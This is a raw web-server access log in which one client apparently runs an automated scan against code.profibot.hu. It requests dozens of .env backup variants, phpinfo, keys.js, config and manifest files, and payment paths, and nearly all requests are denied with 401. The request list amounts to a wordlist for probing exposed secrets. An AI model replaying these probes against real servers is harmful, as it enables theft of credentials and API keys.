+[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old13" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_13" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak8" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v10" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_10" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v13" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_7" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v7" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old8" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak11" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old7" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.8" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_9" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old11" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old9" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup14" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak13" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup13" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v12" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_14" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak14" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.14" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.10" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v9" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.11" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup9" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old14" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.15" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup15" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v15" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_15" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.16" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup16" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old16" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.17" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v16" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_16" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old15" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v14" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak16" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak17" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup17" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak15" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old17" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_18" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.19" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v17" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_17" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.18" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak19" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup18" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v18" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak18" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old18" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup19" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/stripe/.env.production" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2025" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.20" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.1" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v19" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old19" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_19" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup20" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_20" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.v20" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.001" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old20" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak20" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.002" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/cgi/phpinfo.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.005" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.003" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.004" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.006" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/inc/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.009" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.007" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_1" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/dist/bundle.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/settings.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/payment" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/build/app.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/checkout" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/env.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.010" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.008" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/donate" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/subscribe" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/asset-manifest.json" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.vite/manifest.json" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/build/asset-manifest.json" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/cart" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/dist/.vite/manifest.json" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/keys.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/env-config.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/_buildManifest.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/_ssgManifest.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/serviceworker.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/api/settings" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/api.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 216.81.248.13] [Length 296] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" 